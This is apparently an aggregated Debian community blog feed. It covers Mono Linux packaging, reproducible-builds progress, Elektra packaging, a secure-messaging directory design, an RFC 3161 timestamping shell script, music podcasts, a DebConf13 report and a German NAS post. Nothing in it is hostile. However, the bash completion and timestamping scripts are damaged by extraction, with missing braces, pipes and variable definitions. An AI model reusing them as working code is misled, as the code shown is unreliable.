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21 January 2015

Jo Shields: Linux packages, January 2015 edition

The latest version of Mono has released (actually, it happened a week ago, but it took me a while to get all sorts of exciting new features bug-checked and shipshape). Stable packages This release covers Mono 3.12, and MonoDevelop 5.7. These are built for all the same targets as last time, with a few caveats (MonoDevelop does not include F# or ASP.NET MVC 4 support). ARM packages will be added in a few weeks time, when I get the new ARM build farm working at Xamarin s Boston office. Ahead-of-time support This probably seems silly since upstream Mono has included it for years, but Mono on Debian has never shipped with AOT d mscorlib.dll or mcs.exe, for awkward package-management reasons. Mono 3.12 fixes this, and will AOT these assemblies optimized for your computer on installation. If you can suggest any other assemblies to add to the list, we now support a simple manifest structure so any assembly can be arbitrarily AOT d on installation. Goodbye Mozroots! I am very pleased to announce that as of this release, Mono users on Linux no longer need to run mozroots to get SSL working. A new command, cert-sync , has been added to this release, which synchronizes the Mono SSL certificate store against your OS certificate store and this tool has been integrated into the packaging system for all packages, so it is automatically used. Just make sure the ca-certificates-mono package is installed on Debian/Ubuntu (it s always bundled on RPM-based) to take advantage! It should be installed on fresh installs by default. If you want to invoke the tool manually (e.g. you installed via make install, not packages) use
cert-sync /path/to/ca-bundle.crt
On Debian systems, that s
cert-sync /etc/ssl/certs/ca-certificates.crt
and on Red Hat derivatives it s
cert-sync /etc/pki/tls/certs/ca-bundle.crt
Your distribution might use a different path, if it s not derived from one of those. Windows installer back from the dead Thanks to help from Alex Koeplinger, I ve brought the Windows installer back from the dead. The last release on the website was for 3.2.3 (it s actually not this version at all it s complicated ), so now the Windows installer has parity with the Linux and OSX versions. The Windows installer (should!) bundles everything the Mac version does F#, PCL facades, IronWhatever, etc, along with Boehm and SGen builds of the Mono runtime done with Visual Studio 2013. An EXPERIMENTAL OH MY GOD DON T USE THIS IN PRODUCTION 64-bit installer is in the works, when I have the time to try and make a 64-build of Gtk#.

15 January 2015

Lunar: 80%

Unfortunately I could not go on stage at the 31st Chaos Communication Congress to present reproducible builds in Debian alongside Mike Perry from the Tor Project and Seth Schoen from the Electronic Frontier Foundation. I've tried to make it up for it, though and we have made amazing progress. Wiki reorganization What was a massive and frightening wiki page now looks really more welcoming: Screenshot of ReproducibleBuilds on Debian wiki Depending on what one is looking for, it should be much easier to find. There's now a high-level status overview given on the landing page, maintainers can learn how to make their packages reproducible, enthusiasts can more easily find what can help the project, and we have even started writing some history. .buildinfo for all packages New year's eve saw me hacking Perl to write dpkg-genbuildinfo. Similar to dpkg-genchanges, it's run by dpkg-buildpackage to produce .buildinfo control files. This is where the build environment, and hash of source and binary packages are recorded. This script, integrated with dpkg, replace the previous debhelper interim solution written by Niko Tyni. We used to fix mtimes in control.tar and data.tar using a specific addition to debhelper named dh_fixmtimes. To better support the ALWAYS_EXCLUDE environment variable and for pragramtic reasons, we moved the process in dh_builddeb. Both changes were quickly pushed to our continuous integration platform. Before, only packages using dh would create a .buildinfo and thus eventually be considered reproducible. With these modifications, many more packages had their chance and this shows: Growing amount of packages considered reproducible Yes, with our experimental toolchain we are now at more than eighty percent! That's more than 17200 source packages! srebuild Another big item on the todo-list was crossed over by Johannes Schauer. srebuild is a wrapper around sbuild:
Given a .buildinfo file, it first finds a timestamp of Debian Sid from which contains the requested packages in their exact versions. It then runs sbuild with the right architecture as given by the .buildinfo file and the right base system to upgrade from, as given by the version of the base-files package version in the .buildinfo file. Using two hooks it will install the right package versions and verify that the installed packages are in the right version before the build starts.
Understanding problems Over 1700 packages have now been reviewed to understand why build results could not be reproduced on our experimental platform. The variations between the two builds are currently limited to time and file ordering, but this still has uncovered many problems. There are still toolchain fixes to be made (more than 180 packages for the PHP registry) which can make many packages reproducible at once, but others like C pre-processor macros will require many individual changes. debbindiff, the main tool used to understand differences, has gained support for .udeb, TrueType and OpenType fonts, PNG and PDF files. It's less likely to crash on problems with encoding or external tool. But most importantly for large package, it has been made a lot faster, thanks to Reiner Herrmann and Helmut Grohne. Helmut has also been able to spot cross-compilation issues by using debbindiff! Targeting our efforts It gives warm fuzzy feelings to hit the 80% mark, but it would be a bit irrelevant if this would not concern packages that matter. Thankfully, Holger worked on producing statistics for more specific package sets. Mattia Rizzolo has also done great work to improve the scripts generating the various pages visible on All essential and build-esential packages, except gcc and bash, are considered reproducible or have patches ready. After some lengthy builds, I also managed to come up with a patch to make linux build reproducibly. Miscellaneous After my initial attempt to modify r-base to remove a timestamp in R packages, Dirk Eddelbuettel discussed the issue with upstream and came up with a better patch. The latter has already been merged upstream! Dirk's solution is to allow timestamps to be set using an external environment variable. This is also how I modified FontForge to make it possible to reproduce fonts. Identifiers generated by xsltproc have also been an issue. After reviewing my initial patch, Andrew Awyer came up with a much nicer solution. Its potential performance implications need to be evaluated before submission, though. Chris West has been working on packages built with Maven amongst other things. PDF generated by GhostScript, another painful source of troubles, is being worked on by Peter De Wachter. Holger got X.509 certificates signed by the CA cartel for and No more scary security messages now. Let's hope next year we will be able to get certificates through Let's Encrypt! Let's make a difference together As you can imagine with all that happened in the past weeks, the #debian-reproducible IRC channel has been a cool place to hang out. It's very energizing to get together and share contributions, exchange tips and discuss hardest points. Mandatory quote:
* h01ger is very happy to see again and again how this is a nice
         learning circle...! i've learned a whole lot here too... in
         just 3 months... and its going on...!
Reproducible builds are not going to change anything for most of our users. They simply don't care how they get software on their computer. But they care to get the right software without having to worry about it. That's our responsibility, as developers. Enabling users to trust their software is important and a major contribution, we as Debian, can make to the wider free software movement. Once Jessie is released, we should make a collective effort to make reproducible builds an highlight of our next release.

15 November 2014

Jo Shields: Linux packages an update

It s been pointed out to me that many people aren t aware of the current status of Linux packages on, so I m here s a summary: Stable packages Mono 3.10.0, MonoDevelop, NuGet 2.8.1 and F# packages are available. Plus related bits. MonoDevelop on Linux does not currently include the F# addin (there are a lot of pieces to get in place for this to work). These are built for x86-64 CentOS 7, and should be compatible with RHEL 7, openSUSE 12.3, and derivatives. I haven t set up a SUSE 1-click install file yet, but I ll do it next week if someone reminds me. They are also built for Debian 7 on i386, x86-64, and IBM zSeries processors. The same packages ought to work on Ubuntu 12.04 and above, and any derivatives of Debian or Ubuntu. Due to ABI changes, you need to add a second compatibility extension repository for Ubuntu 12.04 or 12.10 to get anything to work, and a different compatibility extension repository for Debian derivatives with Apache 2.4 if you want the mod-mono ASP.NET Apache module (Debian 8+, Ubuntu 13.10+, and derivatives, will need this).
MonoDevelop 5.5 on Ubuntu 14.04

MonoDevelop 5.5 on Ubuntu 14.04

In general, see the install guide to get these going. Docker You may have seen Microsoft recently posting a guide to using ASP.NET 5 on Docker. Close inspection would show that this Docker image is based on our shiny new Xamarin Mono docker image, which is based on Debian 7.The full details are on Docker Hub, but the short version is docker pull mono:latest gets you an image with the very latest Mono.
directhex@desire:~$ docker pull mono:latest
Pulling repository mono
9da8fc8d2ff5: Download complete 
511136ea3c5a: Download complete 
f10807909bc5: Download complete 
f6fab3b798be: Download complete 
3c43ebb7883b: Download complete 
7a1f8e485667: Download complete 
a342319da8ea: Download complete 
3774d7ea06a6: Download complete 
directhex@desire:~$ docker run -i -t mono:latest mono --version 
Mono JIT compiler version 3.10.0 (tarball Wed Nov  5 12:50:04 UTC 2014)
Copyright (C) 2002-2014 Novell, Inc, Xamarin Inc and Contributors.
	TLS:           __thread
	SIGSEGV:       altstack
	Notifications: epoll
	Architecture:  amd64
	Disabled:      none
	Misc:          softdebug 
	LLVM:          supported, not enabled.
	GC:            sgen
The Dockerfiles are on GitHub.

14 June 2014

Ian Donnelly: Week 3: Learning Debian Packaging

This was another good week. This week I focused on cleaning up the merge implementation as well as learning about Debian packaging. As far as cleaning up the implementation, I got a few tests written to test the merge function. Additionally I rewrote the merge command code (the code responsible for the kdb merge command, it depends on the implementation of merge I wrote last week). Now the kdb merge command takes in a parent key for each keyset and creates a keyset containing all the keys under the parent key. It then invokes the KeysetMerge function I wrote on those keysets and saves the returned keyset to the key database. Most of the week I spent learning about Debian packaging. I was able to get some hand-on experience by creating a package for the augeas plugin for Elektra. I modified the control file to include the libaugeas0 dependency and adding in a description of the plugin. Also I created a new libelektra-augeas4.install file to install the share library to the correct location on the system. Then, I tried building the source using git-buildpackage but unfortunately it failed on packaging the plugin because the file was never built. It turned out that the augeas plugin had to be added to ElektraCache.cmake under plugins_dep (plugins with dependencies) so that the plugin would be built on make. So I fixed that and ran buildpackage again and voila! It worked! I successfully make my first Debian package! The other thing I looked into was how configuration files get updated during a package upgrade under Debian. It turns out, most package define their configurations as conffiles . These conffiles do not get overwritten during package upgrade if the user has edited them. Basically, during an upgrade, dpkg calculates a checksum on each conffile and if it has changed, prompts the user what to do. Instead, the goal of our project is to attempt an automatic merge of the conffile and if successful, used the merge version. If the merge is unsuccessful dpkg will prompt the user as usual. I need to figure out how to change dpkg s behavior during an upgrade with a conffile so I can build a prototype of a package upgrade merging a file. Lastly, this week I looked into adding tab completion to the kdb tool. Currently kdb does not try to complete commands using tab completion in bash. It turns out adding tab completion isn t that difficult. You basically just need to write rules for how tab completion should work for your program and add it to /etc/bash_completion.d/ I wrote a basic tab completion script for kdb that will complete the commands for kdb. It follows here: #Proof of concept bash completion for kdb. You must copy this file to /etc/bash_completion.d/kdb and load it with ". /etc/bash_completion.d/kdb"

local cur prev opts
opts="check convert cp export file fstab get getmeta import info ls lsmeta merge mount mv rm set setmeta sget shell test umount vset"
if [[ $ cur == * ]] ; then
COMPREPLY=( $(compgen -W "$ opts " -- $ cur ) )
return 0

complete -F _kdb kdb
Its just a proof on concept but its a really neat feature and surprisingly easy to implement. One of the other students working on Elektra, Felix, is also working on tab completion. I think we will collaborate and have this feature implemented for kdb very soon. For next week I have a few goals I would like to accomplish. First of all I will have a working prototype of a package being upgraded with automatic conffile merging using kdb merge. Second, I want to continue working on the merge implementation to make it cleaner and work on more sophisticated keysets. I also need to add better error handling to tell if a merge was successful or not, and if not why. Third, I want to work on some of the lintan errors for the deb package of Elektra 0.8.6 and try to get some of those fixed to move closer toward release. Lastly I want to updated the kdb man page for Debian to make it more informative for the shell tool. I was able to get all my goals done for this week except the man page and getting some of the lintian errors fixed up. Overall though it was a very productive week. Until next week,
Ian S. Donnelly

14 May 2014

Martín Ferrari: Yakker, part 2: the directory service

This is the second post in a series of posts describing a secure alternative to applications like WhatsApp. I started with the following statement:
I believe it is possible to build a system with the simplicity and functionality of WhatsApp or Viber, which provides end-to-end encryption, is built on free software and open protocols, that supports federation and is almost decentralised, and that would allow interested companies to turn a profit without compromising any of these principles.
In this post, I will outline the concepts behind the most critical component of the architecture: the directory service.

Outline I say this is the most critical component, because here lies what makes this architecture different, but also because this is the weakest link in the whole idea. I expect criticism, specially on some security trade-offs, and I hope that people that know better than me can help me improve it. The directory service is what allows the users to register easily, without using passwords, to be able to receive calls and messages from other users, even if they are not part of the network, and to do all this with a reasonable security model.

Let's get technical The directory service is basically a DNSSEC-protected DNS zone serving ENUM records, along with public keys associated with each user identifier. A TLS-enabled API will enable account creation and validation, DNS records publishing, and encrypted records querying. Applications not supporting that API use standard ENUM querying, and the user manually uses traditional web-based methods for account and records management. This allows interoperability with any existing clients and SIP services. The service will authenticate users by using the usual methods to probe ownership of phone numbers: sending an encrypted SMS with a secret that the client application uses then to claim the phone number. This same method can be used to validate ownership of identifiers that are not phone numbers, like pre-existing SIP or email addresses. Once the user is authenticated, the directory service will publish the user's public key and SIP address, both associated with the phone number. When a user wants to place a call or send a message, it uses a DNSSEC-enabled resolver to get securely the other party's public key and SIP address. The user can also perform bulk look-ups, to discover which people on theirs address book is already in the system. These operations disclose an important amount of private data, and I don't think this can be mitigated in an acceptable manner, and therefore the directory service needs to forget the queries as soon as possible, and not to store any logs of these. Also, DNS queries are not encrypted, and are thus vulnerable to snooping by third parties. To mitigate this, the service needs to implement an encrypted but anonymous API to perform queries, and thus offer extra privacy to clients that support the API. The idea is to have more than one service running on different domain names, but not many: they need to keep consistency and replicate among them, and the security and privacy implications of one service not being properly implemented or administered are too big. Therefore, there must not be more than a handful of these, they need to be properly audited, and must not be operated by any for-profit organisation.

Security The Web of Trust is hard. End users don't like hard. Traditional PKI is prohibitely costly, and broken. OTR is good, but is still not hassle-free. Using one of the proposed extensions to DANE, we can solve this problem: using DNSSEC, we can have each users' public key published where everybody can retrieve it securely. This published key can then be used for end-to-end encryption and client authentication with all the components of this architecture. Who creates the key pair? In the simple case, the client application creates the key pair, and stores it in an appropriate container in the mobile device. It then chooses one of many cooperating directory services, and gets the public key associated with the phone number. If the private key is lost (lost your phone?), a new pair is generated and published, after passing the same checks of number ownership, and the old keys are discarded. This opens the door for some attacks, but those can be mitigated by having the client application verify the public records periodically, and the service requiring extra checks for key replacement. For example, by also using a challenge sent by email. What if I want to do things my way? Perfect, you create your keys, and then use the same mechanisms to register with the identity service. Also, you use the service to tell other users to connect to your own SIP server when they want to talk to your phone number. Does this sound like ENUM? It is ENUM, but better. Just by adding DNSSEC, an unified API, and the capability of publishing key material along with the routing information, you got yourself a reasonably secure way of distributing keys and locating users.

Interaction with other components Once the user records are published, the SIP server can use the public key to authenticate the user, and removes the need for passwords. The same principle applies to account creation: if the user has published key material under a phone number's record, the SIP server must accept account creation requests for the same phone number, provided these are authenticated with the private key. If the user wants to switch providers, it is as simple as creating a new account in the new provider, and then updating the ENUM record. The client application queries the service (and possibly other ENUM providers) before placing a call or sending a message. If the peer has keys published, the client can refuse to communicate if the keys don't match, or the peer is not offering call encryption. When public keys are not found, the client can downgrade to traditional unauthenticated encryption, or unencrypted communications.

To be continued In the next posts, I will talk about the overseeing organisation, the SIP service providers, and the client application, and how they all fit together. Stay tuned!

25 March 2014

Petter Reinholdtsen: Public Trusted Timestamping services for everyone

Did you ever need to store logs or other files in a way that would allow it to be used as evidence in court, and needed a way to demonstrate without reasonable doubt that the file had not been changed since it was created? Or, did you ever need to document that a given document was received at some point in time, like some archived document or the answer to an exam, and not changed after it was received? The problem in these settings is to remove the need to trust yourself and your computers, while still being able to prove that a file is the same as it was at some given time in the past. A solution to these problems is to have a trusted third party "stamp" the document and verify that at some given time the document looked a given way. Such notarius service have been around for thousands of years, and its digital equivalent is called a trusted timestamping service. The Internet Engineering Task Force standardised how such service could work a few years ago as RFC 3161. The mechanism is simple. Create a hash of the file in question, send it to a trusted third party which add a time stamp to the hash and sign the result with its private key, and send back the signed hash + timestamp. Both email, FTP and HTTP can be used to request such signature, depending on what is provided by the service used. Anyone with the document and the signature can then verify that the document matches the signature by creating their own hash and checking the signature using the trusted third party public key. There are several commercial services around providing such timestamping. A quick search for "rfc 3161 service" pointed me to at least DigiStamp, Quo Vadis, Global Sign and Global Trust Finder. The system work as long as the private key of the trusted third party is not compromised. But as far as I can tell, there are very few public trusted timestamp services available for everyone. I've been looking for one for a while now. But yesterday I found one over at Deutches Forschungsnetz mentioned in a blog by David M ller. I then found a good recipe on how to use the service over at the University of Greifswald. The OpenSSL library contain both server and tools to use and set up your own signing service. See the ts(1SSL), tsget(1SSL) manual pages for more details. The following shell script demonstrate how to extract a signed timestamp for any file on the disk in a Debian environment:
set -e
reqfile=$(mktemp -t tmp.XXXXXXXXXX.tsq)
resfile=$(mktemp -t tmp.XXXXXXXXXX.tsr)
if [ ! -f $cafile ] ; then
    wget -O $cafile "$caurl"
openssl ts -query -data "$1" -cert   tee "$reqfile" \
      /usr/lib/ssl/misc/tsget -h "$url" -o "$resfile"
openssl ts -reply -in "$resfile" -text 1>&2
openssl ts -verify -data "$1" -in "$resfile" -CAfile "$cafile" 1>&2
base64 < "$resfile"
rm "$reqfile" "$resfile"
The argument to the script is the file to timestamp, and the output is a base64 encoded version of the signature to STDOUT and details about the signature to STDERR. Note that due to a bug in the tsget script, you might need to modify the included script and remove the last line. Or just write your own HTTP uploader using curl. :) Now you too can prove and verify that files have not been changed. But the Internet need more public trusted timestamp services. Perhaps something for Uninett or my work place the University of Oslo to set up?

10 February 2014

Mario Lang: Neurofunkcasts

I have always loved Drum and Bass. In 2013 I rediscovered my love for Darkstep and Neurofunk, and found that these genres have developed quite a lot in the recent years. Some labels like Black Sun Empire and Evol Intent produce mixes/sets on a regular basis as podcasts these days. This article aggregates some neurofunk podcasts I like a lot, most recent first. Enjoy 33 hours and 57 minutes of fun with dark and energizing beats. Thanks to BSE Contrax and Evol Intent for providing such high quality sets. You can also see the Python source for the program that was used to generate this page.

16 September 2013

Debian Med

DebConf 13 report (by Andreas Tille) General impression unofficial  Scenic Hacklab I'm beginning my DebConf report in an unofficial "Scenic Hacklab" right at the edge of the lake in Yverdon. This is the right place to memorise the last days. When I started from this place cycling to Le Camp 12 days ago I was full of great expectations and what should I say - the reality has even beaten these. Once it comes about comparing DebConfs even if it is an unfair comparison due all the differences my secret long term favourite was Helsinki very closely followed by Argentina and also very closely followed by all the other great DebConfs I joined (and I joined all in Europe). Would Le Camp be able to beat it? The short answer is: Yes, it is now my favourite DebConf while I think I do not suffer from the last-Debconf-was-the-best-DebConf-syndrome (and I realised there are others thinking the same). As you might probably know I'm a bit addicted to swimming. While Helsinki had admittedly the better conditions I was at least able to fix the distance issue using my bicycle. (Hey, those Le Camp photographers did a great job in hiding the fact that you can not actually touch the lake right from the meadow of Le Camp.) Being able to have my bicycle at DebConf scored some extra points. However, the really great view of the lake, the inspiring "Scenic Hacklab" which was my favourite place has bumped DebConf13 at first place in my personal ranking. So it comes quite natural to say: "Kudos to the great organisation team!" They did a Swiss-like precise work and perfectly succeeded in hiding any problems (I assume there were some as always) from the attendees so everything went smooth, nice and shiny for the attendees. The local team was even precise in setting up great weather conditions for DebConf. sunrise over  the lake While saying thanks to the local team I would like to also explicitly thank Luca Capello who has quite some share that this DebConf was possible at all (while I have to decrease my DebConf score one point because he was not really there - Luca to bad that you were not able to come full time!) Also thanks to Gunnar and Gannef who helped remotely (another score down because I were missing them this year as well). Even if it was my favourite DebConf I was not able to work down my todo list fully (which was not only uploading one package per day which I at least statistically fullfilled). But that's probably a general feature of todo lists anyway. One item was definitely done: Doing my daily swimming BoF. I actually was able to do the other parts of the triathlon which was skipped by Christian and have done in summary about 150km cycling with 3500m elevation and estimated 7-8km swimming (0m elevation ;-)). Considering the great view at sunrise over the lake I was not hating my "Senile bed escape" disease too much (I was every day waking up at sunset) - it was simply a great experience. I will never forget seeing water drips glimmering like gold inside the morning sun while seeing the Alps panorama in the distant. I hope I was able to help all interested swimmers with the DebConf Beach Map which was just a by-product of my activities in DebCamp. Speaking about OSM: I was astonished that the area was way less covered than I expected. Thanks to several DebConf attendees the situation became better and the map does not only show random trees in the wild but also the tracks leading to these. (Remark: It was no DebConf attendee who is responsible for plastering the map with single trees.) While I had my mapping focus basically close to the edge of the lake I was also able to even map my very own street. :-) I clearly remember one specific mapping tour when I was invited by the DPL: He convinced me to join him on a bicycle tour and since I was afraid to get fired I joined him instead to keep on hacking. Also Sorina was brave enough to join us on the tour and she did quite well. (Sorina, do you remember the agreement about your work on the installer? ;-)) Lucas described the tour as: going uphill on only asphalted roads. Sorina and me were witnessing the mighty DPL powers when we left the wood around Le Camp to reach the described road: The asphalt was just put onto the road - no doubt that it was done on the immediate demand of mighty DPL. :-) DebCamp time was flying like nose dive and a lot of known (and unknown) faces arrived at Le Camp. What I really liked a lot this year was that several really young children has pulled down the average age of DebConf attendees. I clearly remember all the discussion one year ago what to do about children. As always the issue was solved in a typical Debian way: Just do it and bring your children - they had obviously a great time as well. I think the youngest child was 2 months and the oldest "child" above 20. ;-) Actually Baptiste Perrier did great in making the C&W party a success and had obviously a nice time. (I wished my son would have been able to come as well but he needs to write his bachelor s thesis in physics. :-() It was nice to see the kids using all playing facilities and communicating with geeks. Also I would like to point out that even the very young attendees had their share at the success of DebConf: Just think of the three "bell ringing assistants" who helped me ringing the bells for lunch and dinner. I've got this cool job from Didier in the beginning of DebCamp. I must say having some real bells ringing is by far nicer than just the "lunch / dinner starts in 10 minutes" from IRC bot. The only thing I did not understand was that people did not considered ringing the bells at 8:00 for breakfast as a good idea. Regarding the food in general I would also like to send kudos to the kitchen: It was tasty, freshly prepared, regional food with a good change rate. I really liked this. Extra points for having the chance to sit outside when eating. Talks But lets have a look into the conference programme. I'd really recommend watching the videos of the talks Bits from the DPL (video) and Debian Cosmology (video). I considered both talks as entertaining and interesting. I also really hope that the effort Enrico Zini started in Debian Contributors (video) will be successful. I had some talks and BoFs myself starting with Why running a Blend (video) and I admit that (as usual) the number of attendees was quite low even if I think there is some proof (see below) that it is interesting for way more people who should consider working more "blendish" in their team. Do you know how to recruit one developer per year and relax the man power problem in your team? Feel free to watch the video. We have confirmation that ten DDs of our team have considered to join Debian only because Debian Med exists. Admittedly biology and medicine are really leaf topics inside the Debian universe. So if even this topic that has a very tiny share of the Debian users is able to attract this level of attention - how many more people could we win for multimedia, games, GIS and others? So if you feel you are quite overworked with your packaging and you have no time this is most probably wrong. The amount of time is basically a matter of priorities you set for your tasks. Try to put some higher priority onto using the just existing Blends tools I explained in my talk to attract more users and developers to your team and by doing so spread the workload over more people. It works, the prove was given in my main talk. So before you start working on a specific package you should wonder who else could have an even stronger interest to get this work done and provide him with some additional motivation and help to get the common goal done. The interesting thing is that my BoF about How to attract new developers for your team (video) - which was a simple report about some by-product of the Blends work - made it into the main talk room and got way more attention. For me this is the proof that the Blends concept itself is probably badly perceived as something like "a few outsiders are doing damn specific stuff which is not really interesting for anybody else" instead of what is really is: Smoothing the way from specific upstream applications to the end user via Debian. Once you see the video of this BoF you can observe how my friend Asheesh Laroia became more and more excited about the Blends concept and admitted what I said above: We should have more Blends for different fields. Funnily enough Asheesh asked me in his excitement to talk more about Blends. This would have been a really good suggestion ten years ago. At DebConf 3 in Oslo I had my very first talk about Blends (at this time under the name "Debian Internal Projects"). I continuously kept on talking about this (MiniDebConf Peking 2005, DebConf 5, Helsinki (video), DebConf 7, Edinburgh (video), DebConf 8, Mar del Plata (video), DebConf 9, C ceres (video), MiniDebConf Berlin 2010 (video in German), MiniDebConf Paris 2010 (not video recorded), DebConf 11, Banja Luka (video) ... and these are only (Mini)DebConfs my talks page is full of this topic) and every new year I try different ways to communicate the idea to my fellow Debianistas. I'm wondering how I could invent a title + abstract avoiding the term Blends, put "Git", "release" and "systemd versus upstart" in and being able to inform about Blends reasonably by not becoming to off topic with the abstract. I also registered the Debian Science round table. I admit we were lacking some input from remote via IRC which used to be quite helpful in the past. The attendees agreed upon the handling of citations in debian/upstream files which was invented by Debian Med team to create even stronger bounds to our upstream developers by giving their work extra reward and providing users with even better documentation (see my summary in Wiki). As usual I suggested to create some Debian Science offsprings like "Debian Astronomy", "Debian Electronics", "Debian Mathematics", "Debian Physics" etc. who could perfectly leave the Debian Science umbrella to get a more fine grained structure and a more focused team to enhance the contact to our users. Unfortunately there is nobody who volunteers to take over the lead for such Blends. I have given a short summary about this BoF on the Debian Science mailing list. In the Debian Med meeting I have given some status report. No other long term team members were attending DebConf and so I gave some kind of introduction for newcomers and interested people. I touched also the DebiChem topic which maintains some packages that are used by biologists frequently and so we have a good connection to this team. Finally I had registered three BoFs in Blends I'm actually not (or not yet) active part of. My motivation was to turn the ideas I have explained in my main talk into specific application inside these teams and helping them to implement the Blends framework. In the first BoF about Debian GIS I have shown the usual team metrics graphs to demonstrate, that the one packaging team Pkg-OSM is in danger to become MIA. There are only three persons doing actual uploads. Two of them were at DebConf but did not joined the BoF because they do not consider their contribution to Pkg-OSM as a major part of their general Debian work. I will contact the main contributor David Paleino about his opinion to move the packages step by step into maintenance of Debian GIS packaging team to try to overcome the split of two teams that are sharing a good amount of interest. At least if I might become an Uploader for one of the packages currently maintained by Pkg-OSM I will move this to pkg-grass-devel (which is the name of the packaging team of Debian GIS for historical reasons). The attendees of the BoF have considered this plan as sensible. Moreover I talked about my experiences with OSGeo Live - an Ubuntu derivative that tries to provide a full tool chain to work on GIS and OSM problems ... basically the same goal as Debian GIS has just provided by the OSGeo project. I'm lurking on OSGeo mailing list when I asked explicitly I've got the answer that they are working together with Debian GIS and are using common repository (which is IMHO the optimal way of cooperation). However, it seems that several protagonists of OSGeo Live are underestimating the resources provided by Debian. For instance there was a question about Java packaging issues but people were not aware about the existence of the debian-java mailing list. I was able to give an example how the Debian Med team managed to strengthen its ties to BioLinux that is also an Ubuntu derivative for biologists. At our first Debian Med sprint in 2011 we invited developers from BioLinux and reached a state where they are using the very same VCS on Alioth where we are maintaining our packages. At DebConf I was able to upload two packages where BioLinux developers did certain changes for enhancing the user experience. My "work" was just bumping the version number in changelog and so we did profit from the work of the BioLinux developers as well as they are profiting from our work. I plan to dive a bit more into Debian GIS and try to strengthen the connection to OSGeo Live a bit. The next BoF was the Debian Multimedia meeting. It was nice that the current leader of Ubuntu Studio Kaj Ailomaa joined the meeting. When I was explaining my ideas about cooperation with derivatives I repeated my detailed explanation about the relation with BioLinux. It seems every topic you could cover inside Debian has its related derivative. So to me it seems to be quite natural to work together with the developers of the derivative to join forces. I actually consider a Blend a derivative done the right way = inside Debian. The final work for the derivers that might be left for them is doing some shiny customising of backgrounds or something like this - but all the hard work could and should be done in common with the relevant Debian team. My dream is to raise such relevant teams inside Debian ... the Blends. Finally the last BoF of this series was the Debian Games meeting. As always I presented the team metrics graphs and the Debian Games team members who attended the BoF were quite interested. So it seems to be some unknown fact that team metrics are done for several teams in side Debian and so I repeat the link to it for those who are not yet aware of it. As a result of the BoF Debian Games team members agreed to put some more effort into maintaining their Blends tasks. Moreover Miriam Ruiz wants to put some effort into reviving Debian Jr. Regarding Debian Jr. there was an interesting talk about DouDouLinux - in case you might want to watch the video I'd recommend skipping the first 30min and rather watch the nice live demo. There was also an ad hoc BoF about Debian Jr scheduled to bring together all people interested into this cute project and Per Anderson volunteered to take over the lead. I have given a summary about this specific BoF at the Debian Jr list. For some other talks that I'd regard as remarkable for some reasons: I'd regard the talk "Debian-LAN" by Andreas Mundt as some hidden pearl because it did not got a lot of attention but after having seen the video I was quite impressed - specifically because it is also relevant for the Blends topic. Memories I also liked "Paths into Debian" by Moray Allan (and I was only able to enjoy the latter talks thanks to the great work of the video team!) because it also scratched the same topic I was concerned about in my mentoring talk. Related to this was in my opinion also "Women in Debian 2013" were we tried to find out reasons for the lack of woman compared to other projects and how to overcome this issue. Geert hovering  over the grass Besides the talks I will probably never forget two specific moments that make DebConf so special. One of these moments is recorded on an image that clearly needs no words - just see Geert hovering over the grass. Another strong moment in my personal record was in the DebConf Newbies BoF "First time at DebConf" that unfortunately was not recorded but at least for this statement it would have been very great if we would have some reference better than personal memory. Aarsh Shah a GSoC student from India suddenly raised up and said: "Four months ago I was not even aware that Free Software exists. Now I'm here with so many people who are totally equal. If I will tell my mother at home that I was standing in the same queue where the Debian Project Leader was queuing up for food she will never believe me." He was totally excited about things we are regarding as normal. IMHO we should memorise moments like this that might be part of the key to success in cultures, where Debian is widely unknown and very rarely in use. Amongst these not scheduled great moments the scheduled day trip was also a great thing. I had a really hard time to decide what tour I might join but ended up in the "long distance walking (or should I say running) group". Inspired by the "running Bubulle" who was flashing between the walking groups we went uphill with 5.4km/h which was a nice exercise. Our destination the large cliff was an exciting landscape and I guess we all enjoyed the dinner organised by the "Trout cabal". ;-) say goodby to  friends So I had a hard time to leave Le Camp and tried hard to make sure my memories will remain as long as possible. Keeping some signs attached to my bicycle, conserving the "Scenic Hacklab" sign for my private "scenic hacklab @ home" was one part. I also have cut some branches of the Buxus sempervirens in Le Camp and have put them in my garden at home (where I create some hedgerow from places where I spent some great time). These will probably build a great part of the hedgerow ... Thanks for reading this longish report. Looking forward to see you all in Germany 2015 (or earlier) Andreas. Scenic Hacklab  @ home

28 June 2013

Daniel Leidert: Idea: A new toy (ein neues Spielzeug) ... HP Microserver N54L

Ich fertige regelm ig Backups meiner Systeme an. Diese werden auf der Systemplatte meines Notebooks abgelegt und via rsync auf mobilen Speicher dupliziert. Hierzu verwende ich eine USB-Festplatte. Diese enth lt auch Medien-Dateien und wird regelm ig an den Fernseher angeschlossen. Prinzipiell halte ich meine Daten daher f r sicher. Aber vor kurzem stie ich an die Grenzen ihrer Kapazit t. Schon l nger habe ich nach einer Alternative gesucht, nicht zuletzt da heute viel gr ere Festplatten m glich sind und mein Laptop ber einen eSATA-Anschluss verf gt, der schneller als USB2.0 ist. Meine bevorzugte Variante war ein FANTEC DB-ALU3e Geh use mit einer WD Red WD20EFRX 2TB (5400 RPM) Festplatte, die f r den 24/7 Betrieb zertifiziert ist (und zudem ber eine ausgezeichnete Reputation verf gt). Die Kombination lief sehr gut und schnell, sieht edel aus, ben tigt aber eine externe Stromversorgung. Ich kann Sie als Speicherl sung absolut empfehlen. Allerdings hatte ich zu diesem Zeitpunkt noch weitere Anspr che, die mit der o.g. L sung nicht zu befriedigen sind. So trage ich mich bereits l nger mit dem Gedanken an ein RAID-1-NAS. Au erdem spiegelt sich die Beanspruchung meiner Notebook-Festplatte durch das Pakete-Bauen f r Debian im S.M.A.R.T.-Status wieder. Daher wollte ich diese Arbeit an einen robusten lokalen buildd-Boliden abgeben und habe ber den Kauf eines g nstigen Rechners nachgedacht. Ein NAS verbraucht aber deutlich weniger Strom als ein Desktop-Rechner. Also wie l sst sich ein buildd und ein energiesparendes NAS vereinen? Per Zufall stie ich bei einem lokalen H ndler auf den HP ProLiant MicroServer N40L. Das Angebot klang super und so entschied ich mich zum Kauf meines neuen Spielzeuges: ein HP ProLiant MicroServer N54L, der zuk nftig folgende Aufgaben verrichten soll:
Die Sicherung der Daten erfolgt cron-gesteuert auf den RAID-Verbund in eine gesonderte (verschl sselte) Partition. Der S.M.A.R.T.-Status der Festplatten wird via smartd berwacht. Sollte eine Platte kaputt gehen, bestehen gute Aussichten, die Daten zu retten. Eine zuk nftige Option w re auch noch ein RAID-6 Verbund.
NAS / File-Server
